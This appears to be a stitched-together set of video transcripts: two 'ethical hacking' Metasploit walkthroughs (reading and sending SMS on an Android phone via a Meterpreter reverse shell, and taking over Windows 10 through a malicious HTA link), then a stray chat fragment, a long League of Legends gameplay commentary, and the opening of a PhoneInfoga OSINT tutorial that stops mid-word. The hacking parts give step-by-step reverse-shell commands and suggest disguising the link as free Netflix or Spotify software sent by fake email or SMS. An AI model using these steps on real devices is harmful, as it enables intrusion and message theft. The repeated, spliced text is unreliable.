All right, let's do some co-op. It's been a very long time since. All right, let's do some co-op. It's been a very long time since we've done this mode. The most toxic mode of them all. We have co-op.
There's a feature inside your phone that I really encourage you to disable right now once you complete the tutorial. So right in front of us, I have Android device running on the left side. And in fact, it doesn't matter which device you're on, whether you're an Android device, whether you're an iPhone, doesn't matter. And on the right side, I have Kali Linux running right here, as you can see. And what we're going to do now is to demonstrate one really key, very dangerous function that is available and accessible to anyone who has installed an app inside your phone. So you want to go into the settings page, all right, pull down from the top and click under this gear icon. So go ahead and click on it. Once you clicked on it, what I want to do now is to go ahead and click under apps and notifications and go ahead and click under any apps. And in this case, I'm clicking onto main activity. And by the way, you should not be seeing this app inside your phone. If you do, I'll be very worried for you, because if you see right here, there is permissions tab. Go ahead and click on that too. And you can see this particular permission that is now allowed, which is SMS. What does it mean? All right, is that it means that whoever has been granted this permission will be able to see all the messages inside your phone. If I go to the right side of Kali Linux, all I got to do now is go ahead and start up Metasploit. All right, enter MSF console, hit enter on this, and this will begin opening up, loading Metasploit framework console. So right here we're in, and we can enter use exploit multi handler, and then we can enter set payload Android interpreter reverse underscore TCP, enter IP-ADDR to get your IP address where your Kali Linux will be hosting the listener on. So go ahead and enter set lhost as 192.168.0.106. So this is the Kali Linux IP address. Go ahead and hit enter on this. All right, and enter exploit. That's it. All right, we have our listener server started right now, our hacking server, literally. If I go back to the mobile device and if I open up any apps that has been provided the SMS function to access every messages inside your phone, it is very dangerous. So what I can do right now is to show you something. I can enter, for example, dump underscore SMS, hit enter on this, and we can see we are fetching 5 SMS messages. What does it mean? It means that we just downloaded literally all the messages inside the phone. I can copy this, and now what I can do is go ahead and open up this file that we have downloaded. So we just downloaded all the messages inside the phone. I hit enter on this, and that's it. We can see all these messages, and you can see right here, send money over right now to HackerLoy. And this is dangerous, okay? And if you want to send me money, all right, either join as a YouTube member so they can access all those exclusive members tutorials where we go through with a lot of deep dives into the technicalities of ethical hacking, or you can join us on our Udemy courses, which has been taken up by thousands of students across the world. So I really encourage you to do that. So what we can do next is to demonstrate to you how we can actually send messages over to someone else once we have been granted the permission. So all I got to do right now is enter help, and it will show us all the list of instructions that we can use to interact with the mobile device. So if I enter send, all right, underscore SMS, I hit enter on this, and it even give us the options available, and it even give us an example right here. So all I got to do is enter send SMS followed by -D followed by the phone number in this case. So all I even enter send, all right, underscore SMS, I hit enter on this, and it even give us the options available, and it even give us an example right here. So all I got to do is enter send SMS followed by -D, followed by the phone number. In this case, I'll put the phone number as, say, for example, 9876543221, or 5432, whichever. -T, this is the body of the message that we'll be putting in. And I can say, for example, all right, please subscribe and like the video with notification turn on to Hacker Aloy right now, okay? And I hit enter on this. That's it. My goodness. Transmission successful. Are you seeing this? Okay, SMS sent. I go back to the phone. I click onto the message. You can see right here. Please subscribe and like the video with notification turned on to Hacker Aloy right now. So quickly, disable all those mobile applications that have access into your SMS, because else you could see all these different messages inside your phone, and that's frightening. Okay, and once again, I hope you learned something valuable in today's tutorial. Like, share, and subscribe to the channel so that you can be kept abreast of the latest cybersecurity tutorial. Thank you so much once again for watching. Hi, and welcome back to another episode on how to hack. And today we'll be learning about how to break into your own Windows 10 computer, alright, by clicking onto unknown links, unknown files. So that is pretty dangerous, because just by clicking onto any files that you have no idea where they come from, not coming from any verified sources, that can take over your entire computer. Once again, big disclaimer, hacking is illegal, so you should only do this by hacking yourself, okay, no one else, unless you have written consent. And if you're an ethical hacker, a penetration tester, you have permission from the business, from the organization, from the community to run the hack, okay? If not, only hack yourself. So over here, I actually have it running. So right here, we have the Kali Linux running, so I can go ahead and start up Kali Linux. So we have Kali Linux running, and we are zooming in a little more so it is easier for you to see. And I can go ahead and enter ifconfig to find out the IP address of our Kali Linux machine, because we need this in order to be able to run our listener server, meaning that we can get that connection back in. So here we have MSF console, that is Metasploit framework, that we can launch the attack against the system. All right. So right here we're starting it up, and remember to also run MSF update whenever you get prompted for the update. All right. So we're starting up the console right now, and we are in the console. So the first thing you can do is use exploit Windows miscellaneous, all right, MISC HDA server. Hit enter on this, and over here, what you're going to do now is to go ahead and enter the following. All right. So I want you to enter the following, which is set the L host. All right. So this is the listening host. All right. So this is the IP address that we gotten earlier. Now we will set the server host, okay? And likewise over here, we have the same IP address to host the file. Now we can set the payload. How are we going to manage the hacked device? So we have Windows Meterpreter, right, followed by reverse underscore TCP. And finally, we set the L port. So we set the L port as 8111. So once we're done with this, all you got to do right now is to go ahead and enter the following. Enter exploit, and right here we're now hosting the hacking server. So do you see how easy it is just to host a hacking server? So that's pretty dangerous, isn't it? Even with just a few commands and instructions, we can quickly host a hacking server that we can send to anyone. And once they click onto the link, that will give us full access into the system. So now we're going to see what is going to happen once the user clicks onto the link. We enter exploit, and now we have started the server. So all we're going to do now is to give that particular URL link. We enter exploit, and now we have started the server. So all we're going to do now is to give that particular URL to any users. And chances are a lot of these users are using a Windows computer, and once they click onto the link, that's it. So over here, we have our Windows computer running. So as you can see here, the user has opened up Internet Explorer. It can be any browser. It can be Firefox, it can be Chrome, doesn't matter. So once you give them the link, either through a fake email, all right, through an SMS, through a social media message, all they got to do right now is just to click onto the link, which is a HTA file. Once they hit enter on it, that's it. Okay, we'll gain full access into their entire computer. So right here, I'm entering the following, which is the full link, right, to the HTA file. So the user hits enter on this, and they're going to go ahead and save the file. All right, perhaps we are faking it as a enter on this, the following, which is the full link, right, to the HTA file. So the user hits enter on this, and they're going to go ahead and save the file. All right, perhaps we are faking it as a software that they can use for free. All right, they can watch movies for free. They can get Netflix for free. They can get Spotify for free, whichever the case is. They double clicked on it. They run it. All right. And right here, we can see game over. We have full control of the entire computer. You can see right here, Meterpreter session 1 open. So we can gain full control of the entire computer. You can see right here, Meterpreter session 1 open. So we can gain full control of the entire computer, and we can manage it directly from here. And now we can even set and see all the following sessions in Metasploit, meaning that we can connect to the session and gain full control of the entire computer system and manage it from here using our Metasploit framework. And you can see here, we have the username, all right, as well as the computer name. And we can enter sessions-i to connect over into the session. So here we got the Meterpreter shell, all right, and we can enter help. It means that we are in. We have full, complete control of the entire computer system. That's how quickly we're able to gain control of the entire system. We got the Meterpreter shell, all right, and we can enter help to connect over into the session, all right, as well as the computer name. And we can enter sessions-i to connect over into the session. So here we got the Meterpreter shell, all right, and we can enter help. It means that we are in. We have full, complete control of the entire computer system. That's how quickly we're able to gain control of the entire system. So we can enter all sorts of command. I can enter sysinfo, all right, and we can see all the details of this particular operating system. And this shows us how quickly we can easily gain control of an entire Windows computer in minutes.
Yeah, of course. Yeah, but
So everyone in Finland have hand
yeah,
grenades.
they use in the like army or whatever computer games.
And today, my way
today's video is going to be about how we turn a bad thing into a good thing. I'm gonna back. Yeah, I mean, you guys do. Man, this is bait. This is bait. All right. I mean, good luck. We're gonna grab a sweeper, and we're still gonna start on red. Okay, you know what? That's cool. So when we're running a build like this, I mean, it's not the end of the world. I don't feel like runes are as game changing as they used to be. They're still important. I think Hail of Blades is the best rune, but we can definitely get away with a little bit of electrocute, you know, just change it up a bit. And they're all squishy except Gwen, so this works out. So we're actually going to be running a one shot but kind of on hitty build, and the way that we do that is by using Kraken, right? So Kraken is actually quite good at, oh, this guy's gonna leash for me. What a guy. Kraken's actually quite good at bursting people down. It's not only for the one-shot builds. 1 HP, but we got the double strike. Let's move this over, and we're gonna do our clear here. But what's interesting is that since Kraken gives us 20% crit right off the bat, we can get a third item, Infinity Edge, after our second item. Where typically I'm gonna be running myself, an Ezent Reaver. It's like it's storming outside, guys. It's storming outside. Where we typically run ourselves an Ezent Reaver as our second item. And actually, this wave, this is looking great. We're gonna go ahead and pivot over for a gank here. When you see ganks, you go ganks. I'm gonna sweep. This is why we get this early sweeper, so we can know how we have to approach. Oh man. Oh man, that's kind of like a waste of time. She has teleport, so we're actually gonna wait just a second here. I don't think I could do it. I'm gonna go down into the jungle here. Oh, you don't want to waste too much time, guys. That's what kills you, is wasting time like this. All right, so we see Nocturne. He's level 3. I'm not. This guy's coming up here. He has some prio. This guy's quite low. I'm gonna int on this. I'm gonna int on this. Alright, well, Jax is dead. We know Nocturne's probably pathing up this way. I don't know where Qiyana is. I don't know why she possibly thought that was a good idea there. We're gonna go back here. We got the kill, and I think the wave is largely in Jax's favor. No. Alright, so since Nocturne is over here, I'm gonna go for this, even though my bot lane is fighting. But we just saw Nocturne back, and this is a good opportunity to go for the dragon here. I mean, it's... Okay, he got it. I just want to get this dragon. The ultimate dragon's really good, especially since I have ultimate hunter too. That's something we want to deny these guys. They have good ultimates, right? Nocturne and Gwen and Qiyana, they all have really good ultimates. So not only is this like extra ult for us, it's also an ult denial for the enemy. So there we go. We went ahead and we got this. Let's go ahead and we're just going to deny this plant as well. You got to remember, a lot of the things that you gain are things that you also deny the enemy. Yeah, so Silas said something about JG. He's probably screaming jungle diff right now. But the key, guys, is no matter how much jungle diff people scream, you ignore them. Isn't that right? Isn't that right, guys? Yeah, you know it. You know it. Yep, she has no ward, so she's a free kill. All right. Oh, an enemy Nocturne ult goes to our team. I like it. So we got score 6-9, 7-9. What we're gonna do here is we're gonna force this rift. Keep an eye on Nocturne. He's kind of low. I don't think he can really contest this. I mean, he might. That's why we're gonna pull this in further here. So we pull it in further, obviously, so Nocturne doesn't see it when he randomly walks past here. Because he might go like towards top lane to kill Jax, right? And we don't want to risk that. We should already have our smite. We don't, but we should. Let's go and finish this off. Secured. Grab the rift. Everything's going well. So you can see, even if we don't have like a super amount of priority on this map here, we do have our rift, our dragon. We're 12 CS down. No big deal. And we got some money in the bank. I do like money in the bank. I think this is the first time we killed these Krugs, honestly. And we're gonna start making... Oh, Nocturne's over here. Alright, so this is where we put pressure on bot lane, assuming our Jhin doesn't die here. All right. Free kill here. It's so weird not having Hail of Blades. You see how slow that is? All right, so this is going to be a free first Tower Blood, which is just going to snowball us. Of course, I'm very active and happy to have this wave when I saw Nocturne near the top side. He's coming down here, but it's going to be too late. It's going to be way too late, Mr. Nocturne. So we got to stand near it for the proximity tower gold when we finish it. You get the plates if you walk away, but that extra gold, that 200 gold right there that we just got, we wouldn't have gotten that if we walked away from it. This is a terrible idea. Now, even if you go Hail of Blades, you can still run this build where we go Kraken Essence into Infinity Edge. This is my go-to burst build nowadays. I don't really build Duskblade as much anymore. Obviously, having that extra invis in team fights is really nice, but getting that early Infinity Edge power spike is also very nice. Wait, what did he Bard ult? Oh, that has to be top lane. By the way, you can hit those F keys on your keyboard to quickly go to your top lane to see if there's a Nocturne trail. Top is F2. Yourself is F1. Mid or jungle would be F3. So this is our mid laner. Bottom would be F4, F5. A lot of people don't know that, you know? Okay, no action for me yet. Yeah, we just got to keep getting these dragons. We got one tower, we got the rift, we got 2 dragons. All's well. Okay. That was my bad. I did not realize she was going to dash straight in. I mean, I wouldn't say that's entirely my bad, but... Uh-oh. Chug a pot. Just in case. Just in case. I forgot to chug that pot. Anyway, yeah, we got the double. Yeah, I shouldn't have flashed there. Honestly, I didn't expect Samara to, like, go, like... Okay, you know what? I'm not... That's not going to be my bad. Not my bad. Lag? Just lag. Remember, guys, always blame lag. Even if you got 9 ping, it's always lag. Just say lag in chat. Everybody understands lag, you know? Let's go over here. Oh, that guy is dead. They're gonna push up a rift. As you can see, the burst still exists even with this build. Wish I had Hail of Blades, but I don't. Oh, he just took my Baron plant. Unlucky, unlucky. Maybe we can push mid. All right, let's push it down. We got 3 dragons. I would love to grab the next one. This is a really... Yeah, you see how, like, the difference between having Hail of Blades and not having Hail of Blades? Like, I didn't even get off that many. I didn't even proc the electrocute there. Oh, maybe I did. Oh, Alpha might have procced it. I'm not gonna make it. I could have activated Highlander, maybe. Nah, I wouldn't have made it. Oh, I didn't even get my ult off. Or my Alpha, I mean. Man, she healing. Alright, alright. That's still a hit for me. Get the pickaxe into the Infinity Edge coming up real soon. Just gonna keep farming as much as we can. We need to finish this Infinity Edge. 1,225. It's a big deal. It's a big deal power spike, which is another reason why Kraken's so good. Because Kraken, if we get Kraken, it gives us the ability to burst people down. And it also gives us those Infinity Edge power spikes. I'm not sure if that was worth. I don't know why Jax ran back in. I had that. Yeah, the problem with this build is you don't have the tenacity and the precision tree. You can see if I had tenacity there, I would have killed them. Because I would have gotten alpha back up. I do have stopwatch, my friends. We have a Zanyas on Silas. This guy lost his stopwatch. And he died for it. Oh, shoot. I can't see. Dang. Almost. That's a Baron now. That is a Baron. The stopwatch almost saved me and got us a Baron. Fair item, honestly. Goodness. Oh, I got the dragon. Oh, nice shot. Good. That went well. All right, we got it. All right, now my team can pick up Baron and we're all happy. Oh, nope, they're going for the inhibitor push, which is also fine. That's fine, whatever. I prefer Baron, but they can do what they want to do. Oh man, dude, we killed them all, and instead of grouping and getting Baron or pushing mid, they just split up, and then two of them just die. And I need vision. No vision. Thanks for the help, guys. Dang. That's what you'd rather die that way. Jesus. All right. Whatever floats your boat. All right, so next up is we still have time. So the thing is we want to have the Zanyas during a critical fight like the dragon. So in this case, I believe we would still have time to farm it if I went for like a Phantom Dancer route, because I do want the extra attack speed. I do want it. And yeah, that was a nice secure kill on the Baron. Honestly, I honestly think the Zanyas would just be too critical to play in another team fight. So I'm gonna go ahead and grab the Zanyas, but hopefully my team can just end here. It is a Samira versus 3 people with Baron buff minions. Oh, my team can end. She just went in instead of waiting for Noct. They can end. They can end. Dude, they just keep going one at a time. See, guys, if these guys can, you know, basically hit Master Tier. Hit the Nexus. There you go. If they can basically hit it, you can basically hit it. But honestly, when it came down to that last item, guys, it was a toss-up between Zanyas and like a Phantom Dancer or something. Because I did want the extra attack speed, especially without Hail Blades. It just feels really bad. Hail Blades would have made a huge difference in that fight. And the fights in general. But, you know, even if you're running something like Trill HQ, it doesn't matter. You could just pivot to another build. The only rune that I think that you honestly can't make anything out of is Comet. Like, that rune just sucks for Yi. You know, it's good on poke champs. Just sucks on Yi. I guess I'll honor Sai. I don't like any of them, but, you know, I'm going to honor because that's the kind of person I am. There's Mr. Xerath honor. There we go. Not too bad. That's what I like to see, my friends. That's what I like to see. Not bad, not bad. And, you know, wow, we were actually losing pretty hard. Look at their gold differences in ours. We were actually behind and losing in that fight, but we managed to turn it around. And I attribute all of that to great objective taking. Obviously. So hopefully you guys enjoyed the video. Let me know if you did. Yeah.
hacking phone numbers. In this video, we are not going to be hacking any phone numbers, but we are going to be using hacking tools to find out more information about these phone numbers. Like, hey, who's this number that just called me? I have no idea who they are. Let's find out. Or maybe you're performing a pen test and you're actually hacking a company or person with permission, because disclaimer, this is a hacking tool I'm showing you, part of the OSINT process. Do not hack anyone unless you have explicit permission. And while the information we're accessing is publicly available on the internet, your intent does matter. So yes, practice, yes, have fun, but don't use this information to hack anyone. And if you do want to become an ethical hacker, check out IT Pro TV, the sponsor of this video. They are what I use to study and learn ethical hacking, as well as anything else in IT, from CCNA to A+, Security Plus, whatever. So check them out, link below. Use the code NetworkChuck to get 30% off forever. And also, don't forget to hack the YouTube algorithm today. Hit that like button if you like the video, subscribe, notification bell. Let's hack YouTube. Ethically, of course. Anyways, let's get going. The tool we're going to use is called PhoneInfoga. Now, what do you need? Where can you run this? Pretty much any Linux distro will run this sucker. So this is option 1, but we're not going to do that. If you just want to get your hands dirty and try this tool out right now, I got a fast, free option. If you saw my last video, you might be familiar with it. Google Cloud Console. Basically a free Linux server we get right now in just a few seconds. So let's do it. So I have 2 links in the description below. First is the GitHub page for Phone